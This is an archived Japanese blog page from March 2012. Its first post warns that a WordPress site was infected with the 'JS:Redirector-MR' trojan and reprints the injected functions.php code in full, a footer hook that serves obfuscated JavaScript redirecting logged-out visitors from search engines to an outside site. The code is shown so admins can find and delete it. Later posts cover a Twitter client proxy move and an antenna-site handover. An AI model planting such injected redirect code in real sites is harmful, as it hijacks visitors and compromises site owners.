Month: March 2012

WordPressを狙ったマルウェア “JS:Redirector-MR [Trj]“

 - by Don

名前これで合ってるのかわかりませんけど…。

@yusura さんのブログ「青はココル」(あえてリンクは張りません)がマルウェアに感染していた模様です。「サイトにアクセスするとAvastがJS:Redirector-MR [Trj]というトロイの木馬の警告を出してきます」という連絡があったそうで、実際に怪しいコードが埋め込まれていました。

青はココル

青はココル

動作としては、「ページが表示された数秒後にアダルトサイトにジャンプする」ということが確認されたそうですが、他にどんな影響があるかわかりません。上記の現象を確認した場合は、念のためウイルススキャンを実行し、サイト管理者の方は自分のサイトが改竄されていないかご確認頂いた方が良さそうです。

「青はココル」は現在、下記の記事を参考に埋めこまれたスクリプトを削除した上で、メンテナンスモードになっております。

使用してるテーマのfunctions.phpの一番最後に、

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!?scounter?>';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c?)r[e(c)]=k||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c?)if(k)p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||

er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

今回はこんな文字列が埋め込まれてました
参考になさってください。
テーマの編集で削除し更新でOKでした。

おまけ

WordPressを攻撃対象としているみたいですし、このサイトもWordPressなので一応確認してみましたが、大丈夫でした。

ついでに、伺か関係でWordPressを利用していると思しきサイトを幾つか見てみました。(2012-03-25 現在)
以下のサイトは大丈夫のようです。

以下のサイトは500 Internal Server Error となっていました。まさか、PHPが改竄されて…とか考えるとちょっと心配です。(リンクは張りません)

  • アヤチノオト

参考

ついっとゅうサーバ移転

 - by Don

ついっとゅう4.0リリース

今日の14:47についっとゅうのサーバの転送量が1GBを超え、使用不能になっていました(17:00から無料枠転送量がリセットされ、再び使用可能となりました)。

しばらく放置気味でしたが、じわじわと利用者が増えているようです。当該サーバには他にもはいくゅう各種Twitter Botなどを動かしているので、全滅は免れないといけません。

そこで、利用者が好きなサーバを指定できるようについっとゅうを更新しました。とりあえずcloudControlに1つプロキシサーバを立てましたので、ご利用の方は設定画面からついっとゅう配布元に記載してあるURLを入力してください。

api-proxy-url

api-proxy-url

サーバとOAuthキーを自前で用意する気概のある方は、是非チャレンジしてみてください。

宣伝

上記と関係無いですけど、もどき板が移転したみたいです。

えんいーアンテナ管理者募集のお知らせ

 - by Don

えんいーアンテナが管理終了されたそうです。家の鍵を道路の真ん中に置いておくようなことをされていてかなりビビったので、とりあえず拾っておきました。長らくお疲れ様でした。

もしご覧になっていましたら、メアド変更手続きをお願いします。

mail

mail

私自身は管理を継続する意志が無いので、管理を引き継がれる方をこの記事のコメント欄で募集します。
4月まで現れない場合は、責任をもってアカウントを停止いたします。